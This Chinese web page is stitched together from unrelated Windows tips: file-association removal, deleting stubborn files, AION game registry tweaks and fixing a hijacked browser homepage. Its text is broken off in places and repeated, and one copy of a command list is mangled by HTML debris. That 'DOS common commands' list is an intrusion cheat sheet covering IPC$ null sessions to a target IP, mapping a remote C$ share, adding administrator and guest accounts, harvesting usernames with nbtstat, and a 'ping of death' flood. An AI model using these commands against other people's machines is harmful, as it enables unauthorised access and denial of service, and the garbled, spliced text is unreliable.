如何删除Win 7中已关联的文件类型 在Windows Vista之后,大家可以发Windows资源管理器里面的文件夹选项里面少了一个“文件类型”选项卡。这对于用惯了Windows XP的高级用户无疑又是一个障碍。正是因为少了这个选项卡,我们在Windows Vista以及Windows 7中一旦错误地关联了某个文件类型,那么就“不可逆转”了,我们无法删除这个关联。前几天,我就遇到这个情况,本来我想利用Internet Explorer 的Adobe Flash Player插件来播放下载的一个.swf文件的,可是在选择打开方式的时候,没有注意到系统默认勾选了“始终使用选择的程序打开这种文件(A)”,并且点击了“确定”按钮,结果所有.swf文件的图标都变成了一个白色文件图标中间加上一个IE图标的那种…… 百度一下,发现网上还是有一些解决方案的,但是可以说,很多是不可行的,而且没有一种适用于Windows 7,最多能够对Vista有效。为什么呢?现行的一些解决方案有的说可以使用第三方系统优化程序或者第三方小工具删除,可是这些程序不适用于Windows 7,而且需要安装;还有的说使用系统自带的assoc 命令或者使用控制面板中的默认程序-设置关联来解决,其实也是不可行的,下面我做一个Demo说明为什么不行: 首先打开控制面板,选择“程序”,再次选择“默认程序”,您可以看到如下画面:
接下来,我们点击第二个项目——“将文件类型或协议与程序关联”,将打开如下的窗口:
选中被错误关联的文件类型,您只能点击右上角的“更改程序…”按钮,并且弹出如下对话框: 如上图所示,在这里,您只能将当前被错误关联的程序重新关联到另外的程序,而不能删除此关联。有的网友甚至说,自己用记事本建立一个空的后缀为exe 的假程序,并且更改关联到它,然后删除这个假程序即可,其实也是不可行的,因为下次你双击打开被错误关联的文件时,系统会弹出选择程序的对话框提示您以前的exe找不到了,并且此类文件的图标仍然是错误的。 好了,绕了这么多的弯子,该讲讲如何正确删除已建立的文件关联了。很多网友都说不能通过注册表解决,其实,通过注册表是完全可以解决的,而且绿色无污染,通过系统自带的注册表编辑器或者批处理文件就可以完全解决此问题。下面我们一起来看看如何删除文件关联。
删除文件 怎样删除顽固文件(文件夹) 对于顽固的文件,可以新建一个文本文档,把以下内容复制进去: @echo off DEL /F /A /Q \\?\%1 RD /S /Q \\?\%1 echo 清除完成! echo. & pause 然后关闭点击保存,然后把文件的后缀名改为.bat(关键点)然后就可以把想要删除的文件拖入这个文件当中,最后再删除这个文件即可(此方法适用于一些无法读源文件的文件) [编辑本段] 如何删除顽固的文件(文件夹) 删除顽固文件的常规方法 方法1:重新启动Windows操作系统后,再按常规方式删除文件。 方法2:在DOS(或命令提示符)界面中用Del、Deltree之类的命令删除。 方法3:利用非Windows资源管理器的第三方工具删除,例如具有浏览文件夹功能的TotalCommander、acdsee、FlashFXP、nero等软件。 方法4:如果你安装了两个以上的操作系统,那么就可以在当前系统中删除其它操作系统的文件。 方法5:在启动时按F8键选择进入安全模式执行删除操作。 [编辑本段] 最好用的删除方法 很多杀软都有粉碎文件的功能,比如360,卡卡等。以360为例,打开36 0,在高级工具中,选择“文件粉碎机”,添加你要删除的文件,【记得要打上√】执行“粉碎选中文件”即可。 网上介绍了很多方法,我试了很多,只有这个我觉得是最好用的。 试试,最起码不需要再按照其他的软件了。 删除“其它程序正在使用”的文件 问题表现:
WindowsXP系统中,准备删除一个大容量的AVI格式文件,但系统却总是提示无法执行删除操作,有别的程序在使用,即使刚开机进入Windows系统时也是如此。 问题解决: 方法1:打开记事本,点击菜单栏“文件”→“另存为”,命名文件和你想删除的那个文件名一致(包括扩展名),而后进行替换,会发现容量变为0KB了。此时,执行删除命令即可。 方法2:在那个AVI文件同目录中新建一个文件夹,然后重新启动。现在,不要选那个AVI文件,先选择刚才新建的文件夹,然后再同时按Ctrl键+那个AVI文件,执行删除操作。 方法3:把AVI文件的扩展名改为其它任意无效的文件类型,再执行删除操作。 方法4:有一个一劳永逸的方法就是禁用WindowsXP的媒体预览功能,点击“开始”→“运行”,输入:“CMD”后回车。然后在“命令提示符”窗口下输入:regsvr32/ush media.dll 回车确认操作后将卸载视频文件的预览功能。以后在需要恢复视频文件预览功能时,在“命令提示符”中输入:regsvr32shmedia.dll命令即可。 方法5:启动曾播放过那个AVI文件的媒体播放器,打开另一个文件。此后,再尝试删除即可。 方法6:可用winrar程序删除,用鼠标右键单击那个AVI文件,在弹出菜单中选择“添加到压缩文件”,而后在弹出窗口的“常规”标签页中选择“压缩后删除源文件”复选框。确认操作后,执行压缩操作。最后再删除该压缩文件。 方法7:调出“Wind ows任务管理器”,在其中选择结束Explorer进程,但此时不要关闭该窗口。这时候,会出现像死机一样的状况。我们切换到“应用程序”标签页,点击“新任务”按钮,输入Explorer.exe并确认操作。此后,桌面又恢复正常了,再执行删除操作即可。 巧妙删除“非空文件夹”或“坏文件” 问题表现: 在WindowsXP系统下(NTFS分区格式),无论是在资源管理器还是用第三方工具都删除不了指定文件,例如用TotalCommander删除,先提示文件夹非空,确认后没任何反应。即使用DOS盘启动,加载ntfsfordospro可读写版本,也删除不了,提示说是“坏的文件名”,但是可以看到该文件夹。 问题解决: 这种情况下的文件无法删除很有可能是由于在NTFS格式下长文件名造成的。我们可以使用8.3格式缩小长度或更改路径中部分目录名以减少路径的长度。例如可以暂时把路径中某些目录改名字,或在命令行模式下使用8.3格式。例如,“LinuxFaq”
net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接 net use $">\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接 net use h: $">\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: $">\\ip\c$Content$nbsp;登陆后映射对方C:到本地为H: net use $">\\ip\ipc$Content$nbsp;/del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet, net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/y es可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$Content$nbsp;开启ipc$共享 net share ipc$Content$nbsp;/del 删除ipc$共享 net share c$Content$nbsp;/del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(0 3前的为用户名)-注意:参数-A要大写
以下所列出步骤,与网络其他教程大同小异。 1、为永恒之塔建立一个软件策略 依次执行:开始→运行→,如下截图: 接下来,在新的弹窗中,依次点开计算机配置→Windows设置→基于策略的QoS, 选中基于策略的QoS,然后右键新建一个策略,命名为AION,DSCP设为63即可, 第二页设置目录或者程序名字,如下图,其余默认,一直到完成。 2、添加MSMQ功能 依次执行开始→控制面板→程序→打开或关闭Windows功能 然后在如下新的弹窗中,选择MSMQ,并如下截图中对触发器和代理两个选项进行勾选,其他选项可以不用选择,然后点击确定,小等一会儿,然后进行注册表修改。 3、注册表(regedit)修改 开始→运行→ regedit,然后回车 ①键盘延时修改: 依次点击HKEY_CURRENT_USER\Control Panel\Keyboard,设置成如下数值:键盘延
时为0,按键重复速度为大于30(普通键盘),需要根据实际情况设置。 ②新增TCPNoDelay: 依次点击展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSMQ\Parameters,然后在右侧空白处,点击新建一个QWORD值,命名为TCPNoDelay,并把值设定为1,如下截图: ③新增TcpAckFrequency:依次展开如下目录 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\In terfaces,在Interfaces的目录下,找到一个包含自己IP的项,在其右侧新建一个QWORD值,命名为TcpAckFrequency,并设定数值为1,如下截图: ④新增GlobalmaxTcpWindowSize: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters 依次展开目录,并在其右侧新建一个QWORD值,命名为GlobalmaxTcpWindowSize,并设定你数值为:256960(十进制)。 综上,建议修改的位置均已列出,类似音频服务删除的修改,不建议操作;添加文件,设定CPU和内存使用率的修改,也不建议操作。若要修改,还请慎行!!!
以前主页被修改的问题只是修改了注册表的值或者修改系统的配置信息等,但是只要简单的修改回来就行了,但是现在很多情况下使用360安全卫士等软件也是无法进行主页的更改,因为表面上看是已经修改好了,但是打开IE,还是有问题。这说明这些恶意制造者可谓是费劲了心机了 - -!对主页被恶意修改后,手动修改注册表数值后,关闭注册表编辑器,重新打开仍然会恢复到原来的数值。或者是主页被恶意修改后,手动去修改注册表数值,提示:无法编辑,写该值的新内容时出错。 今天重装了系统,发现一个问题,主页默认是被修改为某某网站的,打开IE就直接跳转到了那个网页的页面,怒之,决定不从表面操作进行问题解决,使用修改注册表键值的方法,从而将其连根拔起。但是中途遇到了一些顽固的问题,不解,遂寻找解决办法,最后将整个解决过程写下,为众人提供一个参考途径。对付主页被锁定的问题,很多情况下,都可以使用这种方法进行解决,不是万能的,也算是千能。由于照顾很多菜鸟,所以写的步骤比较繁琐,部分步骤,高手略去即可。 1、打开IE,将恶意网址例如:www.某某.com 等类似的地址,全部复制下来 2、点击“开始”菜单--运行--regedit,打开后,是注册表编辑器的界面,如果不太懂,没有关系,一步一步的来做的话 基本是不会产生什么异常的。
3、打开以后,鼠标选中第一项就行了(因为我们要搜索全部的注册表,把含有恶意网址的信息查找出来),一般是“我的电脑”。 4、使用“ctrl+F 快捷键”打开查找界面,或者从菜单中的“编辑--查找” 打开也可。
5、将复制的恶意网址黏贴进去,同时将下面的“项、值、数据” 三个后面都打上勾。点击“查找下一个”。 6、查找出来以后,在右侧会显示出注册表的数据,有“名称、类型、数据”等显示出来了。 7、找到那些在“数据”一栏里面含有恶意网址的行,在当条记录的“名称”上,鼠标右键--修改,然后只将www.某某.com 网址删除掉就行了,点击“确定”。
这要修改注册表中的一些东西,给你一个批处理文件,设置一下就好了! 把以下部分复制粘贴到记事本中,保存,然后把保存的文件的扩展名.txt改成.bat然后双击执行! ================================================================= @ cls @ echo off @ title 刚子收集制作整理 ::2为绿色背景F为亮白色背景 @ color 2F @ ECHO. @ ECHO. @ ECHO ┏━━━━━━━━━━━━━━━━━━━━━━━━━┓ @ ECHO ┃┃ @ ECHO ┃刚子收集制作整理┃ @ ECHO ┃大家可以免费使用和修改┃ @ ECHO ┃┃ @ ECHO ┃QQ:15128965 ┃ @ ECHO ┃欢迎光临刚子博客:┃ @ ECHO ┃┃ @ ECHO ┗━━━━━━━━━━━━━━━━━━━━━━━━━┛ @ ECHO. @ ECHO. @ echo %date% %time% %ver% @ ECHO. ::将每行中的第二个和第三个符号传递给for 程序体;用逗号和/或空格定界符号。 ::请注意,这个for 程序体的语句引用%i 来取得第二个符号,引用%j 来取得第三个符号,引用%k来取得第三个符号后的所有剩余符号。 @ for /f "tokens=1,3*" %%i in ('ver') do set v=%%i %%j %%k @ echo ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ @ echo. @ echo 计算机名:%COMPUTERNAME% @ echo 操作系统:%OS% @ echo 操作系统版本:%v% @ echo 系统所在分区:%systemdrive% @ echo 系统所在目录windows:%SystemRoot% @ echo 当前用户名:%USERNAME% @ echo 用户配置文件目录:%USERPROFILE% @ echo. @ echo ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ @ ECHO. ::%windir% 和%SystemRoot% 是一样的 ::for /r "%userprofile%\My Documents\" %%i in (*.*) do echo %%i >>1.txt
Dos常用命令一: net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)